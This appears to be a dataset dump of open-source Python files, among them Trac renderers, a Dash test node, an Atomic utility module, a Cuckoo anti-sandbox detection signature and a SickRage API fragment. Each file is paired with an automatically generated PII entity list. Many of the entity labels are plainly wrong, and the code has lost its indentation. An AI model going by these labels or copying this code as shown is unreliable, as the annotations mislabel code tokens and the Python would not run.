# Fix the \n at EOF.
if not isinstance(stream, list):
stream = list(stream)
found_text = False
for i in range(len(stream)-1, -1, -1):
if stream[i][0] is TEXT:
e = stream[i]
# One chance to strip a \n
if not found_text and e[1].endswith('\n'):
stream[i] = (e[0], e[1][:-1], e[2])
if len(e[1]):
found_text = True
break
if not found_text:
raise StopIteration
for kind, data, pos in _generate():
if kind is TEXT and data == '\n':
yield Stream(buf[:])
del buf[:]
else:
if kind is TEXT:
data = space_re.sub(pad_spaces, data)
buf.append((kind, data, pos))
if buf:
yield Stream(buf[:])
# -- Default annotators
class LineNumberAnnotator(Component):
"""Text annotator that adds a column with line numbers."""
implements(IHTMLPreviewAnnotator)
# ITextAnnotator methods
def get_annotation_type(self):
return 'lineno', _('Line'), _('Line numbers')
def get_annotation_data(self, context):
return None
def annotate_row(self, context, row, lineno, line, data):
row.append(tag.th(id='L%s' % lineno)(
tag.a(lineno, href='#L%s' % lineno)
))
# -- Default renderers
class PlainTextRenderer(Component):
"""HTML preview renderer for plain text, and fallback for any kind of text
for which no more specific renderer is available.
"""
implements(IHTMLPreviewRenderer)
expand_tabs = True
returns_source = True
def get_quality_ratio(self, mimetype):
if mimetype in Mimeview(self.env).treat_as_binary:
return 0
return 1
def render(self, context, mimetype, content, filename=None, url=None):
if is_binary(content):
self.log.debug("Binary data; no preview available")
return
self.log.debug("Using default plain text mimeviewer")
return content_to_unicode(self.env, content, mimetype)
class ImageRenderer(Component):
"""Inline image display.
This component doesn't need the `content` at all.
"""
implements(IHTMLPreviewRenderer)
def get_quality_ratio(self, mimetype):
if mimetype.startswith('image/'):
return 8
return 0
def render(self, context, mimetype, content, filename=None, url=None):
if url:
return tag.div(tag.img(src=url, alt=filename),
class_='image-file')
class WikiTextRenderer(Component):
"""HTML renderer for files containing Trac's own Wiki formatting markup."""
implements(IHTMLPreviewRenderer)
def get_quality_ratio(self, mimetype):
if mimetype in ('text/x-trac-wiki', 'application/x-trac-wiki'):
return 8
return 0
def render(self, context, mimetype, content, filename=None, url=None):
from trac.wiki.formatter import format_to_html
return format_to_html(self.env, context,
content_to_unicode(self.env, content, mimetype))
| 43,065 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2004-2010'], ['DATE_TIME', '2004'], ['PERSON', 'Daniel Lundin'], ['DATE_TIME', '2005-2006'], ['PERSON', 'Christopher Lenz'], ['DATE_TIME', '2006-2007'], ['NRP', 'Christian'], ['PERSON', 'Daniel Lundin'], ['PERSON', 'Christopher Lenz'], ['PERSON', 'Markup'], ['PERSON', 'Href'], ['LOCATION', 'self.resource'], ['PERSON', '1).resource'], ['PERSON', 'oneliner'], ['NRP', 'self._hints'], ['PERSON', 'msword'], ['PERSON', "roff troff'"], ['PERSON', "ini cfg'"], ['PERSON', 'vba'], ['PERSON', 'ada asm asp'], ['PERSON', 'ksh lua'], ['PERSON', 'tcl tex zsh'], ['PERSON', 'mimetype'], ['PERSON', 'Mark'], ['LOCATION', 'convert_content(req'], ['LOCATION', 'mimetype'], ['PERSON', 'dylan'], ['PERSON', 'msword'], ['NRP', 'input_mimettype'], ['LOCATION', 'mimetype'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['LOCATION', "self.log.debug('Trying"], ['NRP', 'force_source'], ['LOCATION', 'basestring'], ['PERSON', "context.get_hint('disable_warnings"], ['PERSON', 'atitle = annotator.get_annotation_type'], ['LOCATION', 'tag_("Can\'t'], ['PERSON', 'mimetype'], ['PERSON', 'mimetype'], ['NRP', 'force_source'], ['URL', 'self.ma'], ['PERSON', 'lineno'], ['URL', 'self.log.de'], ['URL', 'tag.im'], ['URL', 'trac.wiki.fo'], ['URL', 'http://trac.edgewall.org/wiki/TracLicense.'], ['URL', 'http://trac.edgewall.org/log/.'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', 'e:: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'genshi.co'], ['URL', 'genshi.in'], ['URL', 'trac.co'], ['URL', 'trac.co'], ['URL', 'trac.re'], ['URL', 'trac.util.tr'], ['URL', 'self.pa'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'trac.web.ch'], ['URL', 'context.resource.re'], ['URL', 'context.re'], ['URL', 'context.pa'], ['URL', 'context.ch'], ['URL', 'context.ch'], ['URL', 'context.ch'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'context.pa'], ['URL', 'context.re'], ['URL', 'self.re'], ['URL', 'context.re'], ['URL', 'context.resource.re'], ['URL', 'resource.re'], ['URL', 'context.resource.id'], ['URL', 'resource.id'], ['URL', 'context.pa'], ['URL', 'ctx.se'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'hints.ge'], ['URL', 'ctx.se'], ['URL', 'self.pa'], ['URL', 'p.pa'], ['URL', 'TYPES.ke'], ['URL', 't.st'], ['URL', 'TYPES.se'], ['URL', 'TYPES.it'], ['URL', 're.com'], ['URL', 're.VE'], ['URL', 'mimetypes.gu'], ['URL', 're.se'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'content.re'], ['URL', 'mimeview.ma'], ['URL', 'mimeview.to'], ['URL', 'self.in'], ['URL', 'self.ma'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.input.re'], ['URL', 'self.ma'], ['URL', 'self.content.re'], ['URL', 'self.co'], ['URL', 'self.content.se'], ['URL', 'IContentConverter.ge'], ['URL', 'self.co'], ['URL', 'converter.ge'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'converter.co'], ['URL', 'self.an'], ['URL', 'annotator.ge'], 
['URL', 'IHTMLPreviewRenderer.re'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'renderer.ge'], ['URL', 'candidates.so'], ['URL', 'self.ma'], ['URL', 'content.re'], ['URL', 'self.log.de'], ['URL', 'renderer.re'], ['URL', 'result.ge'], ['URL', 'context.req.args.ge'], ['URL', 'context.re'], ['URL', 'tag.pr'], ['URL', 'context.re'], ['URL', 'context.ge'], ['URL', 'trac.web.ch'], ['URL', 'context.re'], ['URL', 'trac.web.ch'], ['URL', 'self.an'], ['URL', 'annotator.ge'], ['URL', 'annotator.ge'], ['URL', 'e.me'], ['URL', 'context.re'], ['URL', 'tag.st'], ['URL', 'tag.pr'], ['URL', 'e.me'], ['URL', 'tag.tr'], ['URL', 'tag.th'], ['URL', 'tag.th'], ['URL', 'tag.tr'], ['URL', 'annotator.an'], ['URL', 'tag.td'], ['URL', 'tag.td'], ['URL', 'tag.th'], ['URL', 'self.ma'], ['URL', 'mimetype.fi'], ['URL', 'self.de'], ['URL', 'MAP.co'], ['URL', 'self.co'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'self.ge'], ['URL', 'trac.util.to'], ['URL', 'Mimeview.ge'], ['URL', 'self.ge'], ['URL', 'self.co'], ['URL', 'self.ma'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.su'], ['URL', 'tag.th'], ['URL', 'self.log.de'], ['URL', 'mimetype.st']] |
8 | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for dashd node under test"""
import decimal
import errno
import http.client
import json
import logging
import os
import subprocess
import time
from .authproxy import JSONRPCException
from .mininode import NodeConn
from .util import (
assert_equal,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class TestNode():
"""A class for representing a dashd node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir):
self.index = i
self.datadir = os.path.join(dirname, "node" + str(i))
self.rpchost = rpchost
if timewait:
self.rpc_timeout = timewait
else:
# Wait for up to 60 seconds for the RPC server to respond
self.rpc_timeout = 60
if binary is None:
self.binary = os.getenv("BITCOIND", "dashd")
else:
self.binary = binary
self.stderr = stderr
self.coverage_dir = coverage_dir
        # Most callers will just need to add extra args to the standard list below. For those callers that need more flexibility, they can just set the args property directly.
self.extra_args = extra_args
self.args = [self.binary, "-datadir=" + self.datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-logtimemicros", "-debug", "-debugexclude=libevent", "-debugexclude=leveldb", "-mocktime=" + str(mocktime), "-uacomment=testnode%d" % i]
self.cli = TestNodeCLI(os.getenv("BITCOINCLI", "dash-cli"), self.datadir)
# Don't try auto backups (they fail a lot when running tests)
self.args.append("-createwalletbackups=0")
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.p2ps = []
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection."""
assert self.rpc_connected and self.rpc is not None, "Error: no RPC connection"
return getattr(self.rpc, name)
def start(self, extra_args=None, stderr=None):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
if stderr is None:
stderr = self.stderr
self.process = subprocess.Popen(self.args + extra_args, stderr=stderr)
self.running = True
self.log.debug("dashd started, waiting for RPC to come up")
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the dashd process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
assert self.process.poll() is None, "dashd exited with status %i during initialization" % self.process.returncode
try:
self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
self.rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.rpc_connected = True
self.url = self.rpc.url
self.log.debug("RPC successfully started")
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
# -28 RPC in warmup
# -342 Service unavailable, RPC server started but is shutting down due to error
if e.error['code'] != -28 and e.error['code'] != -342:
raise # unknown JSON RPC exception
except ValueError as e: # cookie file not found and no rpcuser or rpcassword. dashd still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
raise AssertionError("Unable to connect to dashd")
def get_wallet_rpc(self, wallet_name):
assert self.rpc_connected
assert self.rpc
wallet_path = "wallet/%s" % wallet_name
return self.rpc / wallet_path
def stop_node(self, wait=0):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
self.stop(wait=wait)
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert_equal(return_code, 0)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
def node_encrypt_wallet(self, passphrase):
""""Encrypts the wallet.
This causes dashd to shutdown, so this method takes
care of cleaning up resources."""
self.encryptwallet(passphrase)
self.wait_until_stopped()
def add_p2p_connection(self, p2p_conn, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
self.p2ps.append(p2p_conn)
kwargs.update({'rpc': self.rpc, 'callback': p2p_conn})
p2p_conn.add_connection(NodeConn(**kwargs))
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, "No p2p connection"
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
# Connection could have already been closed by other end.
if p.connection is not None:
p.connection.disconnect_node()
self.p2ps = []
class TestNodeCLI():
"""Interface to bitcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.args = []
self.binary = binary
self.datadir = datadir
self.input = None
def __call__(self, *args, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line args
self.args = [str(arg) for arg in args]
self.input = input
return self
def __getattr__(self, command):
def dispatcher(*args, **kwargs):
return self.send_cli(command, *args, **kwargs)
return dispatcher
def send_cli(self, command, *args, **kwargs):
"""Run bitcoin-cli command. Deserializes returned string as python object."""
pos_args = [str(arg) for arg in args]
named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same bitcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.args
if named_args:
p_args += ["-named"]
p_args += [command] + pos_args + named_args
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
return json.loads(cli_stdout, parse_float=decimal.Decimal)
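# Illustrative usage sketch (added; ``node`` stands for a hypothetical running
# TestNode whose ``cli`` attribute is a TestNodeCLI instance):
#
#   node.cli("-rpcwait").getblockcount()  # positional bitcoin-cli arguments
#   node.cli.getblockchaininfo()          # attribute access dispatches the
#                                         # command through send_cli()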
| 9,148 | [['DATE_TIME', '2017'], ['DATE_TIME', '.authproxy'], ['LOCATION', 'JSONRPCException'], ['PERSON', 'dirname'], ['PERSON', 'extra_args'], ['LOCATION', 'rpchost'], ['DATE_TIME', 'up to 60 seconds'], ['URL', 'logging.ge'], ['URL', 'TestFramework.no'], ['PERSON', 'extra_args'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.log.de'], ['LOCATION', 'JSONRPCException'], ['LOCATION', 'http.client'], ['LOCATION', 'p2p_conn'], ['PERSON', "kwargs['dstport"], ['LOCATION', 'self.p2ps.append(p2p_conn'], ['PERSON', 'returncode ='], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'http.cl'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.bi'], ['URL', 'os.ge'], ['URL', 'self.bi'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.cl'], ['URL', 'os.ge'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.st'], ['URL', 'self.pro'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.pro'], ['URL', 'self.process.re'], ['URL', 'self.co'], ['URL', 'self.rpc.ge'], ['URL', 'e.er'], ['URL', 'errno.EC'], ['URL', 'e.er'], ['URL', 'e.er'], ['URL', 'time.sl'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.st'], ['URL', 'http.client.Ca'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.log.de'], ['URL', 'self.is'], ['URL', 'self.in'], ['URL', 'conn.ad'], ['URL', 'p.co'], ['URL', 'p.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'kwargs.it'], ['URL', 'self.bi'], ['URL', 'self.ar'], ['URL', 'process.com'], ['URL', 'self.in'], ['URL', 'subprocess.Ca'], ['URL', 'self.bi'], ['URL', 'decimal.De']] |
9 | #!/usr/bin/python
# Copyright (C) 2015 Red Hat, All rights reserved.
# AUTHORS: Alex Collins dummy@email.com
import sys
import json
import subprocess
import collections
from fnmatch import fnmatch as matches
from docker.utils import kwargs_from_env
import docker
import selinux
"""Atomic Utility Module"""
ReturnTuple = collections.namedtuple('ReturnTuple',
['return_code', 'stdout', 'stderr'])
if sys.version_info[0] < 3:
input = raw_input
else:
input = input
def _decompose(compound_name):
""" '[reg/]repo[:tag]' -> (reg, repo, tag) """
reg, repo, tag = '', compound_name, ''
if '/' in repo:
reg, repo = repo.split('/', 1)
if ':' in repo:
repo, tag = repo.rsplit(':', 1)
return reg, repo, tag
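# Illustrative behaviour (image names are hypothetical):
#   _decompose('fedora')                         -> ('', 'fedora', '')
#   _decompose('fedora:22')                      -> ('', 'fedora', '22')
#   _decompose('registry.example.com/fedora:22') -> ('registry.example.com', 'fedora', '22')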
def image_by_name(img_name, images=None):
"""
Returns a list of image data for images which match img_name. Will
optionally take a list of images from a docker.Client.images
query to avoid multiple docker queries.
"""
i_reg, i_rep, i_tag = _decompose(img_name)
# Correct for bash-style matching expressions.
if not i_reg:
i_reg = '*'
if not i_tag:
i_tag = '*'
# If the images were not passed in, go get them.
if images is None:
c = docker.Client(**kwargs_from_env())
images = c.images(all=False)
valid_images = []
for i in images:
for t in i['RepoTags']:
reg, rep, tag = _decompose(t)
if matches(reg, i_reg) \
and matches(rep, i_rep) \
and matches(tag, i_tag):
valid_images.append(i)
break
# Some repos end up with the img_name at the end after decompose,
# e.g. rhel7/rsyslog
if rep.endswith(img_name):
valid_images.append(i)
break
return valid_images
def subp(cmd):
"""
Run a command as a subprocess.
Return a triple of return code, standard out, standard err.
"""
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
return ReturnTuple(proc.returncode, stdout=out, stderr=err)
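# Sketch of typical use (the command shown is illustrative):
#   result = subp(['docker', 'ps'])
#   if result.return_code == 0:
#       writeOut(result.stdout)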
def default_container_context():
if selinux.is_selinux_enabled() != 0:
fd = open(selinux.selinux_lxc_contexts_path())
for i in fd.readlines():
name, context = i.split("=")
if name.strip() == "file":
return context.strip("\n\" ")
return ""
def writeOut(output, lf="\n"):
sys.stdout.flush()
sys.stdout.write(str(output) + lf)
def output_json(json_data):
''' Pretty print json data '''
writeOut(json.dumps(json_data, indent=4, separators=(',', ': ')))
def print_scan_summary(json_data, names=None):
'''
Print a summary of the data returned from a
CVE scan.
'''
max_col_width = 50
min_width = 15
def _max_width(data):
max_name = 0
for name in data:
max_name = len(data[name]) if len(data[name]) > max_name \
else max_name
# If the max name length is less that max_width
if max_name < min_width:
max_name = min_width
# If the max name is greater than the max column length
# we wish to use
if max_name > max_col_width:
max_name = max_col_width
return max_name
clean = True
if len(names) > 0:
max_width = _max_width(names)
else:
max_width = min_width
template = "{0:" + str(max_width) + "} {1:5} {2:5} {3:5} {4:5}"
sevs = ['critical', 'important', 'moderate', 'low']
writeOut(template.format("Container/Image", "Cri", "Imp", "Med", "Low"))
writeOut(template.format("-" * max_width, "---", "---", "---", "---"))
res_summary = json_data['results_summary']
for image in res_summary.keys():
image_res = res_summary[image]
if 'msg' in image_res.keys():
tmp_tuple = (image_res['msg'], "", "", "", "")
else:
if len(names) < 1:
image_name = image[:max_width]
else:
image_name = names[image][-max_width:]
if len(image_name) == max_col_width:
image_name = '...' + image_name[-(len(image_name) - 3):]
tmp_tuple = tuple([image_name] +
[str(image_res[sev]) for sev in sevs])
sev_results = [image_res[sev] for sev in
sevs if image_res[sev] > 0]
if len(sev_results) > 0:
clean = False
writeOut(template.format(*tmp_tuple))
writeOut("")
return clean
def print_detail_scan_summary(json_data, names=None):
'''
Print a detailed summary of the data returned from
a CVE scan.
'''
clean = True
sevs = ['Critical', 'Important', 'Moderate', 'Low']
cve_summary = json_data['host_results']
image_template = " {0:10}: {1}"
cve_template = " {0:10}: {1}"
for image in cve_summary.keys():
image_res = cve_summary[image]
writeOut("")
writeOut(image[:12])
if not image_res['isRHEL']:
writeOut(image_template.format("Result",
"Not based on Red Hat"
"Enterprise Linux"))
continue
else:
writeOut(image_template.format("OS", image_res['os'].rstrip()))
scan_results = image_res['cve_summary']['scan_results']
for sev in sevs:
if sev in scan_results:
clean = False
writeOut(image_template.format(sev,
str(scan_results[sev]['num'])))
for cve in scan_results[sev]['cves']:
writeOut(cve_template.format("CVE", cve['cve_title']))
writeOut(cve_template.format("CVE URL",
cve['cve_ref_url']))
writeOut(cve_template.format("RHSA ID",
cve['rhsa_ref_id']))
writeOut(cve_template.format("RHSA URL",
cve['rhsa_ref_url']))
writeOut("")
return clean
def get_mounts_by_path():
'''
Gets all mounted devices and paths
:return: dict of mounted devices and related information by path
'''
mount_info = []
f = open('/proc/mounts', 'r')
for line in f:
_tmp = line.split(" ")
mount_info.append({'path': _tmp[1],
'device': _tmp[0],
'type': _tmp[2],
'options': _tmp[3]
}
)
return mount_info
def is_dock_obj_mounted(docker_obj):
'''
Check if the provided docker object, which needs to be an ID,
is currently mounted and should be considered "busy"
:param docker_obj: str, must be in ID format
:return: bool True or False
'''
mount_info = get_mounts_by_path()
devices = [x['device'] for x in mount_info]
# If we can find the ID of the object in the list
# of devices which comes from mount, safe to assume
# it is busy.
return any(docker_obj in x for x in devices)
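# Sketch (the ID below is hypothetical): check before removing an object.
#   if is_dock_obj_mounted('3f4e8a1b2c3d'):
#       writeOut("Object is mounted/busy, skipping")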
def urllib3_disable_warnings():
if 'requests' not in sys.modules:
import requests
else:
requests = sys.modules['requests']
# On latest Fedora, this is a symlink
if hasattr(requests, 'packages'):
requests.packages.urllib3.disable_warnings() # pylint: disable=maybe-no-member
else:
# But with python-requests-2.4.3-1.el7.noarch, we need
# to talk to urllib3 directly
have_urllib3 = False
try:
if 'urllib3' not in sys.modules:
import urllib3
have_urllib3 = True
except ImportError:
pass
if have_urllib3:
# Except only call disable-warnings if it exists
if hasattr(urllib3, 'disable_warnings'):
urllib3.disable_warnings()
| 8,241 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alex Collins'], ['LOCATION', 'name.strip'], ['PERSON', 'json'], ['PERSON', 'separators='], ['PERSON', 'max'], ['PERSON', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['URL', 'template.fo'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'requests.pa'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'email.com'], ['URL', 'collections.na'], ['URL', 'sys.ve'], ['URL', 'repo.rs'], ['URL', 'docker.Client.im'], ['URL', 'docker.Cl'], ['URL', 'c.im'], ['URL', 'proc.com'], ['URL', 'proc.re'], ['URL', 'selinux.is'], ['URL', 'selinux.se'], ['URL', 'fd.re'], ['URL', 'name.st'], ['URL', 'context.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'res.ke'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'sys.mo'], ['URL', 'python-requests-2.4.3-1.el7.no']] |
10 | # Copyright (C) 2014 Claudio "nex" Guarnieri (@botherder), Accuvant, Inc. (dummy@email.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class Unhook(Signature):
name = "antisandbox_unhook"
description = "Tries to unhook or modify Windows functions monitored by Cuckoo"
severity = 3
confidence = 60
categories = ["anti-sandbox"]
authors = ["nex","Accuvant"]
minimum = "1.2"
evented = True
filter_categories = set(["__notification__"])
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
self.saw_unhook = False
self.unhook_info = set()
def on_call(self, call, process):
subcategory = self.check_argument_call(call,
api="__anomaly__",
name="Subcategory",
pattern="unhook")
if subcategory:
self.saw_unhook = True
funcname = self.get_argument(call, "FunctionName")
if funcname != "":
if (funcname != "SetUnhandledExceptionFilter" and funcname != "SetWindowsHookExW" and funcname != "UnhookWindowsHookEx" and
funcname != "CoCreateInstance") or self.get_argument(call, "UnhookType") != "modification":
self.unhook_info.add("function_name: " + funcname + ", type: " + self.get_argument(call, "UnhookType"))
def on_complete(self):
if len(self.unhook_info) > 5:
weight = len(self.unhook_info)
confidence = 100
if not self.unhook_info:
self.saw_unhook = False
for info in self.unhook_info:
self.data.append({"unhook" : info })
return self.saw_unhook
| 2,422 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Claudio'], ['PERSON', 'Guarnieri'], ['PERSON', 'api="__anomaly'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'lib.cuckoo.com'], ['URL', 'self.sa'], ['URL', 'self.ch'], ['URL', 'self.sa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'info.ad'], ['URL', 'self.ge'], ['URL', 'self.sa'], ['URL', 'self.sa']] |
11 | # coding=utf-8
# Author: Dennis Lutter dummy@email.com
# Author: Jonathon Saine dummy@email.com
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
# TODO: break this up into separate files
# pylint: disable=C0301,C0302
# pylint: disable=E1101,E0202,C0111,C0103
import io
import os
import re
import time
import urllib
import datetime
import traceback
import sickbeard
from sickrage.helper.common import dateFormat, dateTimeFormat, pretty_file_size, sanitize_filename, timeFormat
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException
from sickrage.helper.quality import get_quality_string
from sickrage.media.ShowFanArt import ShowFanArt
from sickrage.media.ShowNetworkLogo import ShowNetworkLogo
from sickrage.media.ShowPoster import ShowPoster
from sickrage.media.ShowBanner import ShowBanner
from sickrage.show.ComingEpisodes import ComingEpisodes
from sickrage.show.History import History
from sickrage.show.Show import Show
from sickrage.system.Restart import Restart
from sickrage.system.Shutdown import Shutdown
from sickbeard.versionChecker import CheckVersion
from sickbeard import db, logger, ui, helpers
from sickbeard import search_queue
from sickbeard import image_cache
from sickbeard import classes
from sickbeard import processTV
from sickbeard import network_timezones, sbdatetime
from sickbeard.common import DOWNLOADED
from sickbeard.common import FAILED
from sickbeard.common import IGNORED
from sickbeard.common import Overview
from sickbeard.common import Quality
from sickbeard.common import SKIPPED
from sickbeard.common import SNATCHED
from sickbeard.common import SNATCHED_PROPER
from sickbeard.common import UNAIRED
from sickbeard.common import UNKNOWN
from sickbeard.common import WANTED
from sickbeard.common import ARCHIVED
from sickbeard.common import statusStrings
try:
import json
except ImportError:
# pylint: disable=F0401
import simplejson as json
# pylint: disable=F0401
from tornado.web import RequestHandler
indexer_ids = ["indexerid", "tvdbid"]
RESULT_SUCCESS = 10 # only use inside the run methods
RESULT_FAILURE = 20 # only use inside the run methods
RESULT_TIMEOUT = 30 # not used yet :(
RESULT_ERROR = 40 # only use outside of the run methods !
RESULT_FATAL = 50 # only use in Api.default() ! this is the "we encountered an internal error" error
RESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error
result_type_map = {
RESULT_SUCCESS: "success",
RESULT_FAILURE: "failure",
RESULT_TIMEOUT: "timeout",
RESULT_ERROR: "error",
RESULT_FATAL: "fatal",
RESULT_DENIED: "denied",
}
# basically everything except RESULT_SUCCESS / success is bad
class ApiHandler(RequestHandler):
""" api class that returns json results """
version = 5 # use an int since floating-point is unpredictable
def __init__(self, *args, **kwargs):
super(ApiHandler, self).__init__(*args, **kwargs)
# def set_default_headers(self):
# self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
def get(self, *args, **kwargs):
kwargs = self.request.arguments
for arg, value in kwargs.iteritems():
if len(value) == 1:
kwargs[arg] = value[0]
